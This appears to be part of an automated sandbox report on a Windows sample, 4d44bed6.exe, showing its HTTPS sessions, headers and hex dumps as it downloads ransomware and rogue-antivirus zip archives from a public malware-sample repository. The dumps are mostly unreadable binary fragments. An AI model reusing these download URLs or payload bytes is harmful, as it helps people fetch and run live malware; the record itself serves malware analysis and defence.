                                                                                                                                                2022-09-29 12:51:30 UTC8880INData Raw: 20 be 1b 55 fd 15 e6 35 bb 83 7b 7b 99 c4 93 1a b4 c4 66 0f 11 d4 eb 3a c3 41 0b 85 fb 2c 6a d8 d1 09 99 cd 0e 67 f5 36 50 f9 e5 2c 48 9a 14 b2 e0 e0 c2 e6 5e d4 14 b3 fc 41 5b ea 8c 8d e1 ad 84 b6 d9 cc ff ef a3 71 30 05 11 63 d8 f7 61 f6 c5 9d 6f fb e1 3c 52 68 38 58 87 87 69 ff 59 f0 48 91 0b 6b 48 59 c6 aa 9f 27 bd c8 cc e8 6c ec b0 49 5a ac 41 0c e5 d2 9e 25 00 92 d6 d1 f2 9e 52 c5 c9 1c 90 3a 04 85 65 06 cd b4 96 81 bb 40 a5 9d 4b 02 3a 6c cf 62 38 05 29 05 3c a9 6c 4f b2 43 3e 32 60 67 c6 c3 7c 8a c2 0c 5e f3 16 e4 57 f8 88 79 ca 38 4e 67 22 77 b0 09 05 ed 63 79 0c a3 24 c3 17 9e cb f6 fc 6e 73 02 bf cb 31 c1 1b 42 39 5e e0 6a 65 8e f1 a8 50 de 59 d8 8c 72 b4 45 f0 82 3d 51 2e 40 ea a2 93 b4 84 60 54 11 57 8a 32 71 1b b3 3c 63 23 06 1e 85 74 bc aa
                                                                                                                                                Data Ascii: U5{{f:A,jg6P,H^A[q0cao<Rh8XiYHkHY'lIZA%R:e@K:lb8)<lOC>2`g|^Wy8Ng"wcy$ns1B9^jePYrE=Q.@`TW2q<c#t
                                                                                                                                                2022-09-29 12:51:30 UTC8896INData Raw: 9b 4d 4d 36 d6 99 f5 52 24 08 2c d6 3d 4e 98 d5 2b aa 1b 6c 00 55 6f 0b bf ca c6 fe d8 2a 22 cf f8 2e 35 69 83 8c bd cf 97 30 1e 63 0a ba bb 78 59 a8 ff 2a 8b 84 cb f5 cf 2d 0a e4 31 72 37 1e 64 d3 ef f3 ed 43 9b 6d 7a d6 f3 51 48 30 51 2f 4a e5 60 64 32 41 0f 34 2d 27 0f 59 7b a6 b6 e0 99 a4 5e 41 98 6d dc d1 0f 2a ea 7b fb c7 0a 33 c5 d2 8c 79 80 90 31 32 c3 2a 87 7b c6 dd 43 f9 52 af 3a 94 c8 9f a8 47 8f d8 04 88 14 1c 05 cd b7 0b 8c b3 5b df 10 41 51 54 34 3f 20 2f 20 3c b4 d3 06 d6 82 83 58 5f ea 54 ed 27 ef ca a2 70 5f bd 3d 00 35 d6 45 f3 10 25 32 70 9d 30 13 0f 92 e3 9b 13 3e 6a ed ab 09 7e 6d 2c 43 b1 f7 bd a4 9d f8 08 30 dd fd 49 12 ee c5 50 47 06 49 1b 03 f8 5d d3 dd a8 32 7e 75 68 da 81 5f 0f 8e 16 39 29 b0 eb 76 a2 a9 50 ea ca 4f fa 7e 61 e3
                                                                                                                                                Data Ascii: MM6R$,=N+lUo*".5i0cxY*-1r7dCmzQH0Q/J`d2A4-'Y{^Am*{3y12*{CR:G[AQT4? / <X_T'p_=5E%2p0>j~m,C0IPGI]2~uh_9)vPO~a
                                                                                                                                                2022-09-29 12:51:30 UTC8912INData Raw: e2 62 7b 1a e2 39 50 cd 3f 44 21 db 38 a4 b4 55 20 ac 1b fe a9 d0 4c 53 a8 8f e4 79 51 59 03 f8 77 d0 3a c9 a0 52 8d 3c 58 a1 79 0a 68 bd 60 3b b7 7d 69 bf 4d dd 44 21 c3 79 95 cb a2 40 52 bf 96 be bd ee 88 be 10 b3 40 98 75 c6 bb 21 2a 4c fe f1 39 ee ea b7 10 86 3e 5d 11 40 c5 22 9f 7f 18 ab 5a 5b be b2 2c 91 60 55 a9 8c 5e b1 85 b5 fe df 89 42 80 cc ba 5d 47 ca da 4d 20 db c9 06 d9 24 29 f8 d0 af c8 8a 7d f6 5b 81 9c 35 69 8e f7 25 26 a8 07 42 67 ad f7 2e 1b e5 4b 4b c7 a7 b2 ec 4a 64 a7 b9 d4 4e e8 b9 07 c1 47 17 10 41 3e 0b f9 00 90 a1 e8 ea d6 b7 df 5c 13 e8 f9 1c a5 6f 11 6e 52 d3 2b 9a 7f 02 7d bf c0 28 89 1f f2 79 0b 1f b0 40 eb b3 f7 8e f9 7d 9f 1d 91 d5 8b b1 ae 86 a6 bb 93 a7 f9 09 7b f9 be 4a b9 b6 ef 83 ca 55 47 74 ca 50 5e b2 80 89 42 23 5a
                                                                                                                                                Data Ascii: b{9P?D!8U LSyQYw:R<Xyh`;}iMD!y@R@u!*L9>]@"Z[,`U^B]GM $)}[5i%&Bg.KKJdNGA>\onR+}(y@}{JUGtP^B#Z
                                                                                                                                                2022-09-29 12:51:30 UTC8922INData Raw: 69 d0 e8 9b 38 1c 01 a6 c3 5a c2 cb 98 51 e6 bd ea 69 f7 6a c5 9c 31 e7 a9 29 9e 10 d2 66 5b a0 a7 73 86 a6 a9 b1 5e c9 87 94 cd cf 5e c8 00 3b e0 7d 59 0a 1f f3 d1 ec ce 43 32 75 42 f1 73 56 dd 8a c6 eb ba ae fd 7a 70 99 3b 49 0e 3a 74 98 8b 19 ae 60 76 c4 e5 de 70 76 29 af ad ca 5c 8a 87 cb 3c e6 9a 3d 02 d4 17 ab c7 f7 49 e4 de b9 90 52 ce f0 4e af 5c d9 5a 48 44 6b 2d a4 6e 25 4f 95 b8 e3 22 c3 97 c0 56 30 c4 68 47 05 51 5c f0 63 4c f2 93 35 38 d5 c3 e4 a4 48 16 d7 b6 cf f6 58 69 95 ee 33 a2 59 b8 f8 d5 f3 47 32 1c 8f c3 59 ba 96 4b c3 71 37 62 bb 71 2a 25 51 ab 53 00 1b f4 c2 68 b8 a9 09 8d 7f 17 c4 94 22 9c 1c e9 e0 07 53 44 9a 09 17 9b 51 fc 8f 29 1e d6 34 6e 61 d6 0c 97 cf 2f 13 cd 32 88 c5 4e f3 83 3f 5e 42 b8 cf 89 dd 2a 58 e5 0f 94 0a 57 61 b2
                                                                                                                                                Data Ascii: i8ZQij1)f[s^^;}YC2uBsVzp;I:t`vpv)\<=IRN\ZHDk-n%O"V0hGQ\cL58HXi3YG2YKq7bq*%QSh"SDQ)4na/2N?^B*XWa
                                                                                                                                                2022-09-29 12:51:30 UTC8938INData Raw: c9 45 fa 26 65 5e 21 93 90 73 90 d0 c9 49 38 50 d4 fc 0f a8 dc c2 07 fb 1e 75 2d 01 ec e4 4a e9 fb 01 3e 88 dd 88 63 86 6c 65 e8 bc dc 4e c4 7c 7a 61 27 61 00 79 0d 43 93 31 53 ee fc 5c 5f 2e bd bf 83 79 1f 21 a4 d5 f1 b3 ec 40 91 b6 73 ed 71 58 d1 81 7c f1 fa 17 3a 4d ea 7e 7d 67 a1 a9 c1 ed c2 b1 24 4b c7 27 e3 1c e8 dd 15 eb 03 9d 1d 54 24 51 f4 fb 04 90 b3 aa 98 1a 82 3a 40 62 98 35 82 72 f7 9c b7 6a 3e 9b f4 11 47 43 95 74 2a 6e bf 86 06 fe 5b 62 87 3d ea 2a f5 9e e9 ac 67 35 93 19 42 11 e0 f8 3f 27 4f 85 e5 b3 1c ce 72 c4 57 69 97 d1 c4 86 1d 5c 15 b7 d9 b5 64 55 fe 4a 51 5a 00 d2 eb 56 26 0c 72 c9 27 31 b7 63 3c c8 0d 35 9f 4c 87 4f 7d d1 1d a5 78 84 87 e5 57 bf e6 8f 71 a2 3d 2a 77 98 a5 76 49 8f f8 17 08 f2 6c 12 37 fb 1e be d8 6a 9f 6f 83 e4 45
                                                                                                                                                Data Ascii: E&e^!sI8Pu-J>cleN|za'ayC1S\_.y!@sqX|:M~}g$K'T$Q:@b5rj>GCt*n[b=*g5B?'OrWi\dUJQZV&r'1c<5LO}xWq=*wvIl7joE
                                                                                                                                                2022-09-29 12:51:30 UTC8954INData Raw: d7 45 8b d8 e4 eb 22 fe 07 2e 13 d0 b0 36 cd e0 14 d9 69 22 b5 a8 f1 18 6a 16 42 af 46 37 ad 83 db b3 8e 18 e1 cf 1a bd a5 09 aa 3e 67 18 9e d2 a6 ca 3b 26 5d e9 2b 83 a3 2f 17 19 27 a9 93 79 53 e6 a6 f3 25 a2 82 4a 0c 19 d9 6a 4e 93 cc f6 7c 34 de 37 28 18 62 93 03 10 a6 83 c5 d1 a2 b3 82 4f 2a 4b 73 cd 8e 06 62 e7 ae 3b be fd 54 b6 86 e9 72 40 de 4f 63 90 69 75 1d bb 94 ac 71 02 82 42 4a 4c c6 46 cf bf 98 30 f7 09 3c 56 ae fd 22 d4 fd 65 4b 2f 78 eb 70 7a 85 44 24 9a b3 1b d2 e8 05 f9 33 18 a3 91 6a a9 46 ab 84 67 81 5b 9e e8 4a 26 ef 07 73 75 e3 6b 2f c1 41 b9 56 40 f4 bc be 35 47 56 67 b4 4e 85 af 2a 95 bb b8 1f 3d 0d 91 eb 0f 03 01 be 36 0d c0 ba fa 0a 0b 3c 51 4d 6c bb 07 9b fa 33 c9 07 67 ff a3 5f 15 26 89 57 6b 48 4d 8a b6 3c a6 c6 3d f6 b2 c0 e7
                                                                                                                                                Data Ascii: E".6i"jBF7>g;&]+/'yS%JjN|47(bO*Ksb;Tr@OciuqBJLF0<V"eK/xpzD$3jFg[J&suk/AV@5GVgN*=6<QMl3g_&WkHM<=
                                                                                                                                                2022-09-29 12:51:30 UTC8970INData Raw: 25 46 9c c4 43 c9 6d f3 8b 3c bb 43 2c e4 8e 71 96 ab d4 66 51 05 76 2f 57 13 6e 6a 89 fc d1 09 e2 2b 79 d5 69 9e f5 01 2d 0c 05 57 fd 2f a3 01 09 41 05 80 f9 a0 77 ca 89 03 88 3f 88 8f 0e 46 ec 9d d9 e8 e2 ed be a8 36 4c e8 96 c5 f7 51 78 49 aa a0 e7 ad 91 ac 16 49 46 59 e0 f3 4e 59 d1 1c 75 f2 8a 69 24 65 35 07 5f 23 c8 02 38 c7 fe 3d d7 34 ff 32 9d 0f 0c 3a c6 75 33 77 eb e3 f1 c4 32 57 41 99 f7 76 d3 25 ec 13 43 09 9b 9e 59 b9 95 92 7d fa 0b 9e 58 54 fa 7d 3a 82 45 07 37 c8 b5 a5 cb 82 7f d9 9d 85 d8 31 fa fa ad 0a f7 4a 9a 59 be 04 a4 e2 c1 c0 ff b9 54 eb 72 3f 80 71 77 d3 d0 cb c9 fa 2d b1 c7 4c 2c e3 0c 0a 18 45 df 66 df 44 2d c1 b8 a7 c4 62 0b 8b ba 04 86 3c 87 68 1c b4 6b 68 b3 95 7a 4a 15 06 4d 96 8c b5 7c 32 cd 63 04 52 c6 da ac 0a 41 d2 f4 aa
                                                                                                                                                Data Ascii: %FCm<C,qfQv/Wnj+yi-W/Aw?F6LQxIIFYNYui$e5_#8=42:u3w2WAv%CY}XT}:E71JYTr?qw-L,EfD-b<hkhzJM|2cRA


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                3192.168.2.549703185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:17 UTC399OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:17 UTC399INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 116134
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:17 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6944-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455877.234651,VS0,VE13
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 1540ee293ee49aa555cc7853b8aa4e25b690b0c7
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:17 GMT
                                                                                                                                                Source-Age: 82
                                                                                                                                                2022-09-29 12:51:17 UTC400INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                2022-09-29 12:51:17 UTC416INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                                                                Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
                                                                                                                                                2022-09-29 12:51:17 UTC432INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                                                                Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                                                                2022-09-29 12:51:17 UTC448INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                                                                Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                                                                2022-09-29 12:51:17 UTC464INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                                                                Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                                                                2022-09-29 12:51:17 UTC480INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                                                                Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                                                                2022-09-29 12:51:17 UTC496INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                                                                Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                                                                2022-09-29 12:51:17 UTC512INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                                                                Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                30192.168.2.549730140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:31 UTC8979OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:31 UTC8979INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:31 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:31 UTC8980INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                31192.168.2.549731185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:31 UTC8982OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:32 UTC8982INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 716432
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2dd2f92f25598d9ce7015fc31af79216c3c4239d1c9016d16e6d1fa2f0f83264"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 98A4:E4BD:C06779:CC85EC:6335934E
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:32 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6952-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455892.967494,VS0,VE158
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e7cc1d1650635e8b8a058209a67b931386256bf0
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:32 GMT
                                                                                                                                                Source-Age: 0
